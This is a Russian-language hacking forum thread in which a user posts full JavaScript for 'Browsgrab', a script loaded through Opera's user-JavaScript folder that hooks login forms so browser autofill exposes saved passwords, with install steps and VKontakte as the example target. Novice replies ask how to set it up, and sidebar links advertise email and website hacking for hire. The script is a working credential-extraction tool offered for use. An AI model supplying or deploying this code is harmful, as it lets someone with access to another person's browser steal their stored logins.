CASINOJOY - Ставка На Успех! Проверь Свою Удачу!


Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Вытаскиваем сохранённые пароли из Opera
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / Программы RSS подписка на сообщения с форума Subscribe
Взлом программ. Кряки и серийники качаем тут

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 6031
Вытаскиваем сохранённые пароли из Opera
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
.pascal




Silver Member
# | Сообщение добавлено 27.02.2011 21:34:26
Отредактировано 25.12.2012 17:38:54 by .pascal
Решил поделиться недавно написанным мною скриптиком который извлекает сохранённые в веб-страницах пароли.
 
Как работает
1) В веб-страницу внедряется специальный javascript-код
2) Заходим на страницу с сохранёнными паролями (поля подсвечиваются жёлтым цветом)
3) Внедрённый javascript-код устанавливает ловушки на все формы с полями ввода пароля
4) При автозаполнении полей срабатывают ловушки и вам отображается их содержимое (в том числе и пароли)
 
Как сделать
1) создаём папку например c:\browsgrab
2) создаём в ней файл opera.js со следующим кодом:
Javascript
function bgCapture(form)
 {
 inputs = form.getElementsByTagName('input');
 result = '';
 for (j=0; j<inputs.length; j++)
  {
  if (inputs[j].type=='' || inputs[j].type=='text') result += 'Строка ввода';
  else if (inputs[j].type=='textarea') result += 'Широкое поле ввода';
  else if (inputs[j].type=='checkbox') result += 'Флажёк';
  else if (inputs[j].type=='radio') result += 'Переключатель';
  else if (inputs[j].type=='button') result += 'Кнопка';
  else if (inputs[j].type=='file') result += 'Файл';
  else if (inputs[j].type=='password') result += 'ПАРОЛЬ';
  else if (inputs[j].type=='image') result += 'Кнопка-картинка';
  else if (inputs[j].type=='reset') result += 'Кнопка очистки';
  else if (inputs[j].type=='submit') result += 'Кнопка отправки формы';
  else if (inputs[j].type=='password') result += 'ПАРОЛЬ';
  else if (inputs[j].type=='hidden') result += 'Скрытые данные';
  else result += 'Неизвестное поле';
  if (inputs[j].name) result += ' "' + inputs[j].name + '"';
  result += ': ' + inputs[j].value + "\r\n";
  }
 if (result) alert("В этой форме найдены следующие данные:\r\n" + result);
 else alert('В этой форме не найдено никаких данных для отправки на сервер');
 return false;
 }
 
function bgSetHooks()
 {
 if (!document.forms) return alert('Пароли на этой странице не найдены');
 bgforms = document.getElementsByTagName('form');
 for (j=0; j<bgforms.length; j++) bgforms[j].onsubmit = 'bgCapture(this); return false;';
 }
 
function bgNeutralizeForms()
 {
 if (!document.forms) return alert('Формы на этой странице не найдены');
 bgforms = document.getElementsByTagName('form');
 for (j=0; j<bgforms.length; j++) bgforms[j].onsubmit = 'return false;';
 }
 
function bgSearchPasswords()
 {
 if (!document.forms) return alert('Пароли на этой странице не найдены');
 bgforms = document.getElementsByTagName('form');
 for (j=0; j<bgforms.length; j++)
  {
  inputs = bgforms[j].getElementsByTagName('input');
  pwd = false;
  step_result = 'Обнаружена форма ';
  if (bgforms[j].name) step_result += '"' + bgforms[j].name + '" ';
  step_result += "с данными:\r\n";
 
  for (i=0; i<inputs.length; i++)
   {
   if (inputs[i].type=='' || inputs[i].type=='text') step_result += 'Строка ввода';
   else if (inputs[i].type=='textarea') step_result += 'Широкое поле ввода';
   else if (inputs[i].type=='checkbox') step_result += 'Флажёк';
   else if (inputs[i].type=='radio') step_result += 'Переключатель';
   else if (inputs[i].type=='button') step_result += 'Кнопка';
   else if (inputs[i].type=='file') step_result += 'Файл';
   else if (inputs[i].type=='password') {step_result+='ПАРОЛЬ'; pwd=true;}
   else if (inputs[i].type=='image') step_result += 'Кнопка-картинка';
   else if (inputs[i].type=='reset') step_result += 'Кнопка очистки';
   else if (inputs[i].type=='submit') step_result += 'Кнопка отправки формы';
   else if (inputs[i].type=='password') step_result += 'ПАРОЛЬ';
   else if (inputs[i].type=='hidden') step_result += 'Скрытые данные';
   else step_result += 'Неизвестное поле';
   if (inputs[i].name) step_result += ' "' + inputs[i].name + '"';
   step_result += ': ' + inputs[i].value + "\r\n";
   }
 
  if (pwd) alert(step_result);
  }
 }
 
function bgInit()
 {
 if (!document) return false;
 if (!document.body) return false;
 clearInterval(bgtimer);
 
 bgdiv  = document.createElement('div');
 
 bgdiv.style.display = 'block';
 bgdiv.style.position = 'absolute';
 bgdiv.style.left = '0';
 bgdiv.style.top = '0';
 bgdiv.style.width = '300px';
 bgdiv.style.height = '50px';
 bgdiv.style.textAlign = 'left';
 bgdiv.style.background = '#000';
 bgdiv.style.color = '#FFF';
 bgdiv.style.borderRight = '1px solid #FFF';
 bgdiv.style.borderBottom = '1px solid #FFF';
 bgdiv.style.font = 'normal 12px courier new';
 bgdiv.style.zIndex = '10000';
 bgdiv.style.padding = '3px 6px';
 bgdiv.innerHTML = "<div><span>Browsgrab v1.0</span><a style='color:#FFF !important; float:right' href='http://google.com/'>by Pascal</a></div>\r\n";
 bgNeutralizeForms
 bgdiv.innerHTML += "[ <a style='color:#0F0' href='javascript:bgSetHooks()'>Установить ловушки</a> |\r\n";
 bgdiv.innerHTML += "<a style='color:#0F0' href='javascript:bgNeutralizeForms()'>Обезвредить формы</a> |\r\n";
 bgdiv.innerHTML += "<a style='color:#0F0' href='javascript:bgSearchPasswords()'>Искать пароли</a> ]";
 
 document.body.appendChild(bgdiv);
 }
 
bgtimer = setInterval('bgInit()', 1000);
3) в опере находим инструменты -> общие настройки -> расширенные -> содержимое -> настройки javascript -> папка пользовательских javascript
в это поле прописываем c:\browsgrab и сохраняем настройки
4) заходим на любую страницу где есть сохранённые пароли, например вконтакт (только не забудьте из него выйти)
5) в появившемся чёрном меню (вверху слева) нажмите "установить ловушки"
6) нажимаем кнопку с ключиком (или ctrl+enter) после чего браузер заполняет поля и тут-же попадает в ловушку. На этом этапе должно появться всплывающее окно с данными которые скрипт выловил из заполненной формы
 
4 этап должен выглядеть так:

 
5 этап:

 
PS
Такое можно сделать и с firefox и chrome. А вот с ie и safari не пробовал. Если будет достаточно желающих, могу сделать в виде плагинов к этим браузерам.
 
--
Silence is golden...
Сказать спасибо Ответить Цитировать

Freddddy


Novice
# | Сообщение добавлено 07.03.2011 15:01:40
"создаём в ней файл opera.js" а как заздать этот файл?
Сказать спасибо Ответить Цитировать

Freddddy


Novice
# | Сообщение добавлено 07.03.2011 15:13:51
Это на любом сайте канает?
 
Добавлено 07.03.2011 15:22:16 (через 8 минут 25 секунд )
 
можно плиз скриншот как должен выгдядеть текстовый файл
Сказать спасибо Ответить Цитировать

SWATT




Novice
# | Сообщение добавлено 07.03.2011 15:57:28
Где писать эти скрипты?
Сказать спасибо Ответить Цитировать

azamprod




Gold Member
# | Сообщение добавлено 07.03.2011 16:01:13
Freddddy

можно плиз скриншот как должен выгдядеть текстовый файл
зачем тебе скрин? ну раз надо то вот))...

если ты имел ввиду внутренность файла то пост первый читай...
Сказать спасибо Ответить Цитировать

Freddddy


Novice
# | Сообщение добавлено 07.03.2011 17:02:51
Отредактировано 07.03.2011 17:14:11 by Freddddy
гг) а теперь подскажите еще по этой теме плиз http://www.hackzone.ru/forum/open/id/17452/
 
Добавлено 07.03.2011 17:04:53 (через 2 минуты 2 секунды )
 
У меня слева не появляется черный экран, а ячейки куда вписывать имя и пароль выделяются желтым
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • Опубликован бесплатный дешифратор для вымогателя BlackByte
  • Zerodium покупает уязвимости в ExpressVPN, NordVPN и Surfshark
  • За взломом сайтов REvil стояли правоохранительные органы
  • Уязвимость ProxyToken позволяет воровать почту через Microsoft Ex...
  • T-Mobile взломали через уязвимый роутер
  • Ботнет Phorpiex прекратил работу, его исходный код выставлен на п...
  • Критическая уязвимость в Cosmos DB
  • Исследователи научились обходить PIN-коды для карт Mastercard и M...
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Программы » Re: Hasp ключ для ABC-4
  • Портал / Отзывы и предложения » Предлагаем партнерство вашему форуму.
  • Разное / Предложения работы » взлом почты
  • Разное / Предложения работы » Сервис Postman - 500 руб за получение писем и 10€ за пересыл...
  • Разное / Куплю, приму в дар » Покупка аккаунтов Uphold
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Разное / Предложения работы » Re: Нужен Взлом сайта на DLE
  • Взлом и безопасность / Новичкам » Re: Помогите взломать gmail.com

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}